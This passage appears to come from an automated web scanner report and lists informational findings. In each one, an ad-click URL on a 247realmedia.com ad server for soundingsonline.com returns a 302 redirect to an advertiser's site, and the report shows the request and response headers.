Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/112793374/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:39:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.140. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1137419713/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1137419713/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1137419713/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.acboatshow.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1137419713/x01/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:38 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.acboatshow.com/
Content-Length: 302
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.acboatshow.com/">here</a>.</p>
<hr>

...[SNIP]...

20.141. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/113792961/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/113792961/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/113792961/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/113792961/x01/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:47:08 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 328
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.142. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1138258938/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:26 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.143. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/114076315/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/114076315/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/114076315/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/114076315/Top/Dom_Ent/SoundingsDisplatches-Sound-Bnr-728x90-Defender/dispatches_defender2.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:59:59 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.144. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1146188754/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1146188754/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1146188754/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1146188754/Middle/Dom_Ent/House-Sound-Bnr-Middle/dispatches_600x100.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:50:51 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter
Content-Length: 354
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter">here</a>
...[SNIP]...

20.145. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1153711873/Right1/Dom_Ent/SeaTow-Sound-Btn-300x100/bfs_seatow_300x100_Jul70910.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:58:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 389
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.146. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1155840941/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:48:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.147. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1159061525/x04/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 16:18:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 317
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.148. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1161264624/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1161264624/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1161264624/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.nsboats.com/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1161264624/x01/Dom_Ent/NovaScotia-Sound-TileAd/125x125_novascotia_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:02:17 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.nsboats.com/
Content-Length: 299
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.nsboats.com/">here</a>.</p>
<hr>
<ad
...[SNIP]...

20.149. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1167313603/x01/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:51:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.150. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.keenanauction.com/auction.cgi?&i=2039

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1174768862/x02/Dom_Ent/Keenan-Sound-TileAd/125x125_keenan_0111_new.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:38:55 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.keenanauction.com/auction.cgi?&i=2039
Content-Length: 329
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.keenanauction.com/auction.cgi?&amp;i=2039">here</a>
...[SNIP]...

20.151. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • http://www.gssdesign.com/cmta_landing11/

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1185005715/x02/Dom_Ent/CMTA-Sound-TileAd/cmta_0111.gif/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 14:44:44 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: http://www.gssdesign.com/cmta_landing11/
Content-Length: 316
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.gssdesign.com/cmta_landing11/">here</a>
...[SNIP]...

20.152. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
  • http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x
The response contains the following link to another domain:
  • https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18

Request

GET /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1187342870/Right/Dom_Ent/SeaTow-Sound-Rect-300x250/bfs_seatow_300x250.jpg/726348573830302b4e47344144525279?x HTTP/1.1
Host: oasc05139.247realmedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 15:09:22 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Location: https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18
Content-Length: 390
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3b45525d5f4f58455e445a4a423660;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://www.soundingssellmyboat.com/webbase/en/std/jsp/WebBaseMain.do;jsessionid=C2A3BE71EE34C5087C97F3A067159F18">here</a>
...[SNIP]...

20.153. http://oasc05139.247realmedia.com/RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1191108965/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oasc05139.247realmedia.com
Path:   /RealMedia/ads/click_lx.ads/www.soundingsonline.com/index.php/L33/1191108965/x04/Dom_Ent/AtlanticCity-Sound-TileAd/125x125_ac_0111.jpg/726348573830302b4e47344144525279

Issue detail

The page was loaded from a URL containing a query string:
